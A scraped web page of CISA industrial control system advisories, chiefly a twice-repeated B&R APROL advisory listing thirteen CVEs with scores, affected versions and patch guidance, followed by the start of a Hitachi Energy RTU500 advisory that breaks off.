Successful exploitation of these vulnerabilities could allow an attacker to execute commands, elevate privileges, gather sensitive information, or alter the product.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
B&R reports that the following products are affected:

B&R APROL: All versions prior to 4.4-01 (CVE-2024-45483, CVE-2024-10209)
B&R APROL: All versions 4.4-00P1 and prior (CVE-2024-45482)
B&R APROL: All versions 4.4-00P5 and prior (CVE-2024-45481, CVE-2024-45480, CVE-2024-8315, CVE-2024-45484, CVE-2024-8313, CVE-2024-8314, CVE-2024-10206, CVE-2024-10207, CVE-2024-10208, CVE-2024-10210)

3.2 VULNERABILITY OVERVIEW
3.2.1 INCLUSION OF FUNCTIONALITY FROM UNTRUSTED CONTROL SPHERE CWE-829
An Inclusion of Functionality from Untrusted Control Sphere vulnerability in the SSH server on B&R APROL <4.4-00P1 may allow an authenticated local attacker from a trusted remote server to execute malicious commands.
CVE-2024-45482 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-45482. A base score of 8.5 has been calculated; the CVSS vector string is (AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
3.2.2 INCOMPLETE FILTERING OF SPECIAL ELEMENTS CWE-791
An Incomplete Filtering of Special Elements vulnerability in scripts using the SSH server on B&R APROL <4.4-00P5 may allow an authenticated local attacker to authenticate as another legitimate user.
CVE-2024-45481 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-45481. A base score of 8.5 has been calculated; the CVSS vector string is (AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
3.2.3 IMPROPER CONTROL OF GENERATION OF CODE (‘CODE INJECTION’) CWE-94
An improper control of generation of code (‘Code Injection’) vulnerability in the AprolCreateReport component of B&R APROL <4.4-00P5 may allow an unauthenticated network-based attacker to read files from the local system.
CVE-2024-45480 has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2024-45480. A base score of 9.2 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N).
3.2.4 IMPROPER HANDLING OF INSUFFICIENT PERMISSIONS OR PRIVILEGES CWE-280
An Improper Handling of Insufficient Permissions or Privileges vulnerability in scripts used in B&R APROL <4.4-00P5 may allow an authenticated local attacker to read credential information.
CVE-2024-8315 has been assigned to this vulnerability. A CVSS v3 base score of 5.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2024-8315. A base score of 6.8 has been calculated; the CVSS vector string is (AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N).
3.2.5 ALLOCATION OF RESOURCES WITHOUT LIMITS OR THROTTLING CWE-770
An Allocation of Resources Without Limits or Throttling vulnerability in the operating system network configuration used in B&R APROL <4.4-00P5 may allow an unauthenticated adjacent attacker to perform Denial-of-Service (DoS) attacks against the product.
CVE-2024-45484 has been assigned to this vulnerability. A CVSS v3 base score of 7.6 has been calculated; the CVSS vector string is (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H).
A CVSS v4 score has also been calculated for CVE-2024-45484. A base score of 7.2 has been calculated; the CVSS vector string is (AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N).
3.2.6 MISSING AUTHENTICATION FOR CRITICAL FUNCTION CWE-306
A Missing Authentication for Critical Function vulnerability in the GRUB configuration used in B&R APROL <4.4-01 may allow an unauthenticated physical attacker to alter the boot configuration of the operating system.
CVE-2024-45483 has been assigned to this vulnerability. A CVSS v3 base score of 6.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-45483. A base score of 7.0 has been calculated; the CVSS vector string is (AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
3.2.7 EXPOSURE OF SENSITIVE SYSTEM INFORMATION TO AN UNAUTHORIZED CONTROL SPHERE CWE-497
An Exposure of Sensitive System Information to an Unauthorized Control Sphere and Initialization of a Resource with an Insecure Default vulnerability in the SNMP component of B&R APROL <4.4-00P5 may allow an unauthenticated adjacent-based attacker to read and alter configuration using SNMP.
CVE-2024-8313 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-8313. A base score of 8.7 has been calculated; the CVSS vector string is (AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
3.2.8 EXPOSURE OF DATA ELEMENT TO WRONG SESSION CWE-488
An Incorrect Implementation of Authentication Algorithm and Exposure of Data Element to Wrong Session vulnerability in the session handling used in B&R APROL <4.4-00P5 may allow an authenticated network attacker to take over a currently active user session without login credentials.
CVE-2024-8314 has been assigned to this vulnerability. A CVSS v3 base score of 8.0 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-8314. A base score of 5.5 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H).
3.2.9 SERVER-SIDE REQUEST FORGERY (SSRF) CWE-918
A Server-Side Request Forgery vulnerability in the APROL Web Portal used in B&R APROL <4.4-00P5 may allow an unauthenticated network-based attacker to force the web server to request arbitrary URLs.
CVE-2024-10206 has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2024-10206. A base score of 6.9 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N).
3.2.10 SERVER-SIDE REQUEST FORGERY (SSRF) CWE-918
A Server-Side Request Forgery vulnerability in the APROL Web Portal used in B&R APROL <4.4-00P5 may allow an authenticated network-based attacker to force the web server to request arbitrary URLs
CVE-2024-10207 has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2024-10207. A base score of 5.3 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N).
3.2.11 IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION (‘CROSS-SITE SCRIPTING’) CWE-79
An Improper Neutralization of Input During Web Page Generation vulnerability in the APROL Web Portal used in B&R APROL <4.4-00P5 may allow an authenticated network-based attacker to insert malicious code which is then executed in the context of the user’s browser session.
CVE-2024-10208 has been assigned to this vulnerability. A CVSS v3 base score of 6.1 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).
A CVSS v4 score has also been calculated for CVE-2024-10208. A base score of 5.1 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N).
3.2.12 EXTERNAL CONTROL OF FILE NAME OR PATH CWE-73
An External Control of File Name or Path vulnerability in the APROL Web Portal used in B&R APROL <4.4-005P may allow an authenticated network-based attacker to access data from the file system.
CVE-2024-10210 has been assigned to this vulnerability. A CVSS v3 base score of 8.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N).
A CVSS v4 score has also been calculated for CVE-2024-10210. A base score of 8.4 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N).
3.2.13 INCORRECT PERMISSION ASSIGNMENT FOR CRITICAL RESOURCE CWE-732
An Incorrect Permission Assignment for Critical Resource vulnerability in the file system used in B&R APROL <4.4-01 may allow an authenticated local attacker to read and alter the configuration of another engineering or runtime user.
CVE-2024-10209 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-10209. A base score of 8.5 has been calculated; the CVSS vector string is (AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
3.3 BACKGROUND

CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
COUNTRIES/AREAS DEPLOYED: Worldwide
COMPANY HEADQUARTERS LOCATION: Austria

3.4 RESEARCHER
ABB PSIRT reported these vulnerabilities to CISA.
4. MITIGATIONS
B&R has identified the following specific workarounds and mitigations users can apply to reduce risk:

B&R APROL 4.4-01: B&R recommends that users apply the patch or upgrade to a non-vulnerable version at their earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. As some of the vulnerabilities affect the confidentiality of credentials, it is recommended to change all secrets/passwords after applying the update. (CVE-2024-45483, CVE-2024-10209)
B&R APROL 4.4-00P1: B&R recommends that users apply the patch or upgrade to a non-vulnerable version at their earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. As some of the vulnerabilities affect the confidentiality of credentials, it is recommended to change all secrets/passwords after applying the update. (CVE-2024-45482)
B&R APROL 4.4-00P5: B&R recommends that users apply the patch or upgrade to a non-vulnerable version at their earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. As some of the vulnerabilities affect the confidentiality of credentials, it is recommended to change all secrets/passwords after applying the update. (CVE-2024-45481, CVE-2024-45480, CVE-2024-8315, CVE-2024-45484, CVE-2024-8313, CVE-2024-8314, CVE-2024-10206, CVE-2024-10207, CVE-2024-10208, CVE-2024-10210)

The following product versions have been fixed:

B&R APROL 4.4-01: APROL version 4.4-01 is a fixed version for CVE-2024-45483 and CVE-2024-10209
B&R APROL 4.4-00P1: APROL versions 4.4-00P1 and later are fixed versions for CVE-2024-45482
B&R APROL 4.4-00P5: APROL versions 4.4-00P5 and later are fixed versions for CVE-2024-45481, CVE-2024-45480, CVE-2024-8315, CVE-2024-45484, CVE-2024-8313, CVE-2024-8314, CVE-2024-10206, CVE-2024-10207, CVE-2024-10208, and CVE-2024-10210

For more information, see B&R’s security advisory.
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:

Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
Locate control system networks and remote devices behind firewalls and isolating them from business networks.
When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:

Do not click web links or open attachments in unsolicited email messages.
Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
5. UPDATE HISTORY

April 3, 2025: Initial publication of B&R SA24P015 

View CSAF

1. EXECUTIVE SUMMARY

  • CVSS v4 9.2
  • ATTENTION: Exploitable remotely/low attack complexity
  • Vendor: B&R
  • Equipment: APROL
  • Vulnerabilities: Inclusion of Functionality from Untrusted Control Sphere, Incomplete Filtering of Special Elements, Improper Control of Generation of Code (‘Code Injection’), Improper Handling of Insufficient Permissions or Privileges , Allocation of Resources Without Limits or Throttling, Missing Authentication for Critical Function, Exposure of Sensitive System Information to an Unauthorized Control Sphere, Exposure of Data Element to Wrong Session, Server-Side Request Forgery (SSRF), Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’), External Control of File Name or Path, Incorrect Permission Assignment for Critical Resource

2. RISK EVALUATION

Successful exploitation of these vulnerabilities could allow an attacker to execute commands, elevate privileges, gather sensitive information, or alter the product.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

B&R reports that the following products are affected:

  • B&R APROL: All versions prior to 4.4-01 (CVE-2024-45483, CVE-2024-10209)
  • B&R APROL: All versions 4.4-00P1 and prior (CVE-2024-45482)
  • B&R APROL: All versions 4.4-00P5 and prior (CVE-2024-45481, CVE-2024-45480, CVE-2024-8315, CVE-2024-45484, CVE-2024-8313, CVE-2024-8314, CVE-2024-10206, CVE-2024-10207, CVE-2024-10208, CVE-2024-10210)

3.2 VULNERABILITY OVERVIEW

3.2.1 INCLUSION OF FUNCTIONALITY FROM UNTRUSTED CONTROL SPHERE CWE-829

An Inclusion of Functionality from Untrusted Control Sphere vulnerability in the SSH server on B&R APROL <4.4-00P1 may allow an authenticated local attacker from a trusted remote server to execute malicious commands.

CVE-2024-45482 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2024-45482. A base score of 8.5 has been calculated; the CVSS vector string is (AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).

3.2.2 INCOMPLETE FILTERING OF SPECIAL ELEMENTS CWE-791

An Incomplete Filtering of Special Elements vulnerability in scripts using the SSH server on B&R APROL <4.4-00P5 may allow an authenticated local attacker to authenticate as another legitimate user.

CVE-2024-45481 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2024-45481. A base score of 8.5 has been calculated; the CVSS vector string is (AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).

3.2.3 IMPROPER CONTROL OF GENERATION OF CODE (‘CODE INJECTION’) CWE-94

An improper control of generation of code (‘Code Injection’) vulnerability in the AprolCreateReport component of B&R APROL <4.4-00P5 may allow an unauthenticated network-based attacker to read files from the local system.

CVE-2024-45480 has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N).

A CVSS v4 score has also been calculated for CVE-2024-45480. A base score of 9.2 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N).

3.2.4 IMPROPER HANDLING OF INSUFFICIENT PERMISSIONS OR PRIVILEGES CWE-280

An Improper Handling of Insufficient Permissions or Privileges vulnerability in scripts used in B&R APROL <4.4-00P5 may allow an authenticated local attacker to read credential information.

CVE-2024-8315 has been assigned to this vulnerability. A CVSS v3 base score of 5.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).

A CVSS v4 score has also been calculated for CVE-2024-8315. A base score of 6.8 has been calculated; the CVSS vector string is (AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N).

3.2.5 ALLOCATION OF RESOURCES WITHOUT LIMITS OR THROTTLING CWE-770

An Allocation of Resources Without Limits or Throttling vulnerability in the operating system network configuration used in B&R APROL <4.4-00P5 may allow an unauthenticated adjacent attacker to perform Denial-of-Service (DoS) attacks against the product.

CVE-2024-45484 has been assigned to this vulnerability. A CVSS v3 base score of 7.6 has been calculated; the CVSS vector string is (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H).

A CVSS v4 score has also been calculated for CVE-2024-45484. A base score of 7.2 has been calculated; the CVSS vector string is (AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N).

3.2.6 MISSING AUTHENTICATION FOR CRITICAL FUNCTION CWE-306

A Missing Authentication for Critical Function vulnerability in the GRUB configuration used in B&R APROL <4.4-01 may allow an unauthenticated physical attacker to alter the boot configuration of the operating system.

CVE-2024-45483 has been assigned to this vulnerability. A CVSS v3 base score of 6.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2024-45483. A base score of 7.0 has been calculated; the CVSS vector string is (AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).

3.2.7 EXPOSURE OF SENSITIVE SYSTEM INFORMATION TO AN UNAUTHORIZED CONTROL SPHERE CWE-497

An Exposure of Sensitive System Information to an Unauthorized Control Sphere and Initialization of a Resource with an Insecure Default vulnerability in the SNMP component of B&R APROL <4.4-00P5 may allow an unauthenticated adjacent-based attacker to read and alter configuration using SNMP.

CVE-2024-8313 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2024-8313. A base score of 8.7 has been calculated; the CVSS vector string is (AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).

3.2.8 EXPOSURE OF DATA ELEMENT TO WRONG SESSION CWE-488

An Incorrect Implementation of Authentication Algorithm and Exposure of Data Element to Wrong Session vulnerability in the session handling used in B&R APROL <4.4-00P5 may allow an authenticated network attacker to take over a currently active user session without login credentials.

CVE-2024-8314 has been assigned to this vulnerability. A CVSS v3 base score of 8.0 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2024-8314. A base score of 5.5 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H).

3.2.9 SERVER-SIDE REQUEST FORGERY (SSRF) CWE-918

A Server-Side Request Forgery vulnerability in the APROL Web Portal used in B&R APROL <4.4-00P5 may allow an unauthenticated network-based attacker to force the web server to request arbitrary URLs.

CVE-2024-10206 has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).

A CVSS v4 score has also been calculated for CVE-2024-10206. A base score of 6.9 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N).

3.2.10 SERVER-SIDE REQUEST FORGERY (SSRF) CWE-918

A Server-Side Request Forgery vulnerability in the APROL Web Portal used in B&R APROL <4.4-00P5 may allow an authenticated network-based attacker to force the web server to request arbitrary URLs

CVE-2024-10207 has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).

A CVSS v4 score has also been calculated for CVE-2024-10207. A base score of 5.3 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N).

3.2.11 IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION (‘CROSS-SITE SCRIPTING’) CWE-79

An Improper Neutralization of Input During Web Page Generation vulnerability in the APROL Web Portal used in B&R APROL <4.4-00P5 may allow an authenticated network-based attacker to insert malicious code which is then executed in the context of the user’s browser session.

CVE-2024-10208 has been assigned to this vulnerability. A CVSS v3 base score of 6.1 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).

A CVSS v4 score has also been calculated for CVE-2024-10208. A base score of 5.1 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N).

3.2.12 EXTERNAL CONTROL OF FILE NAME OR PATH CWE-73

An External Control of File Name or Path vulnerability in the APROL Web Portal used in B&R APROL <4.4-005P may allow an authenticated network-based attacker to access data from the file system.

CVE-2024-10210 has been assigned to this vulnerability. A CVSS v3 base score of 8.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N).

A CVSS v4 score has also been calculated for CVE-2024-10210. A base score of 8.4 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N).

3.2.13 INCORRECT PERMISSION ASSIGNMENT FOR CRITICAL RESOURCE CWE-732

An Incorrect Permission Assignment for Critical Resource vulnerability in the file system used in B&R APROL <4.4-01 may allow an authenticated local attacker to read and alter the configuration of another engineering or runtime user.

CVE-2024-10209 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2024-10209. A base score of 8.5 has been calculated; the CVSS vector string is (AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).

3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: Austria

3.4 RESEARCHER

ABB PSIRT reported these vulnerabilities to CISA.

4. MITIGATIONS

B&R has identified the following specific workarounds and mitigations users can apply to reduce risk:

  • B&R APROL 4.4-01: B&R recommends that users apply the patch or upgrade to a non-vulnerable version at their earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. As some of the vulnerabilities affect the confidentiality of credentials, it is recommended to change all secrets/passwords after applying the update. (CVE-2024-45483, CVE-2024-10209)
  • B&R APROL 4.4-00P1: B&R recommends that users apply the patch or upgrade to a non-vulnerable version at their earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. As some of the vulnerabilities affect the confidentiality of credentials, it is recommended to change all secrets/passwords after applying the update. (CVE-2024-45482)
  • B&R APROL 4.4-00P5: B&R recommends that users apply the patch or upgrade to a non-vulnerable version at their earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. As some of the vulnerabilities affect the confidentiality of credentials, it is recommended to change all secrets/passwords after applying the update. (CVE-2024-45481, CVE-2024-45480, CVE-2024-8315, CVE-2024-45484, CVE-2024-8313, CVE-2024-8314, CVE-2024-10206, CVE-2024-10207, CVE-2024-10208, CVE-2024-10210)

The following product versions have been fixed:

  • B&R APROL 4.4-01: APROL version 4.4-01 is a fixed version for CVE-2024-45483 and CVE-2024-10209
  • B&R APROL 4.4-00P1: APROL versions 4.4-00P1 and later are fixed versions for CVE-2024-45482
  • B&R APROL 4.4-00P5: APROL versions 4.4-00P5 and later are fixed versions for CVE-2024-45481, CVE-2024-45480, CVE-2024-8315, CVE-2024-45484, CVE-2024-8313, CVE-2024-8314, CVE-2024-10206, CVE-2024-10207, CVE-2024-10208, and CVE-2024-10210

For more information, see B&R’s security advisory.

CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:

  • Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
  • Locate control system networks and remote devices behind firewalls and isolating them from business networks.
  • When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.

5. UPDATE HISTORY

  • April 3, 2025: Initial publication of B&R SA24P015

 Read More

Hitachi Energy RTU500 Series

 ​View CSAF
1. EXECUTIVE SUMMARY

CVSS v4 8.7
ATTENTION: Exploitable remotely/low attack complexity
Vendor: Hitachi Energy
Equipment: RTU500 series
Vulnerabilities: Null Pointer Dereference, Insufficient Resource Pool, Missing Synchronization

2. RISK EVALUATION
Successful exploitation of these vulnerabilities could allow an attacker to cause a denial-of-service condition.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
The following Hitachi Energy products are affected:

RTU500 series CMU: Versions 12.0.1 – 12.0.14 (CVE-2024-10037)
RTU500 series CMU: Versions 12.2.1 – 12.2.12 (CVE-2024-10037)
RTU500 series CMU: Versions 12.4.1 – 12.4.11 (CVE-2024-10037)
RTU500 series CMU: Versions 12.6.1 – 12.6.10 (CVE-2024-10037)
RTU500 series CMU: Versions 12.7.1 – 12.7.7 (CVE-2024-10037)
RTU500 series CMU: Versions 13.2.1 – 13.2.7 (CVE-2024-10037)
RTU500 series CMU: Versions 13.4.1 – 13.4.4 (CVE-2024-10037, CVE-2024-11499, CVE-2024-12169)
RTU500 series CMU: Versions 13.5.1 – 13.5.3 (CVE-2024-10037, CVE-2024-11499, CVE-2024-12169)
RTU500 series CMU: Versions 13.6.1 (CVE-2024-10037, CVE-2024-11499, CVE-2024-12169)
RTU500 series CMU: Versions 13.7.1 (CVE-2024-11499)
RTU500 series CMU: Versions 13.7.1 – 13.7.4 (CVE-2024-12169, CVE-2025-1445)

3.2 VULNERABILITY OVERVIEW
3.2.1 NULL POINTER DEREFERENCE CWE-476
A vulnerability exists in the RTU500 web server component that can cause a denial of service to the RTU500 CMU application if a specially crafted message sequence is executed on a WebSocket connection. An attacker must be properly authenticated and the test mode function of RTU500 must be enabled to exploit this vulnerability. The affected CMU will automatically recover itself if an attacker successfully exploits this vulnerability.
CVE-2024-10037 has been assigned to this vulnerability. A CVSS v3 base score of 4.9 has been assigned; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
A CVSS v4 score has also been calculated for CVE-2024-10037. A base score of 5.9 has been calculated; the CVSS vector string is (AV:N/AC:H/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N).
3.2.2 NULL POINTER DEREFERENCE CWE-476
A vulnerability exists in RTU500 IEC 60870-4-104 controlled station functionality, that allows an authenticated and authorized attacker to perform a CMU re-start. The vulnerability can be triggered if certificates are updated while in use on active connections. The affected CMU will automatically recover itself if an attacker successfully exploits this vulnerability.
CVE-2024-11499 has been assigned to this vulnerability. A CVSS v3 base score of 4.9 has been assigned; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
A CVSS v4 score has also been calculated for CVE-2024-11499. A base score of 6.9 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N).
3.2.3 INSUFFICIENT RESOURCE POOL CWE-410
A vulnerability exists in RTU500 IEC 60870-5-104 controlled station functionality and IEC 61850 functionality, that allows an attacker performing a specific attack sequence to restart the affected CMU. This vulnerability only applies, if secure communication using IEC 62351-3 (TLS) is enabled.
CVE-2024-12169 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been assigned; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
A CVSS v4 score has also been calculated for CVE-2024-12169. A base score of 8.7 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N).
3.2.4 MISSING SYNCHRONIZATION CWE-820
A vulnerability exists in RTU IEC 61850 client and server functionality that could impact the availability if renegotiation of an open IEC61850 TLS connection takes place in specific timing situations, when IEC61850 communication is active. Precondition is that IEC61850 as client or server are configured using TLS on RTU500 device. It affects the CMU the IEC61850 stack is configured on.
CVE-2025-1445 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been assigned; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
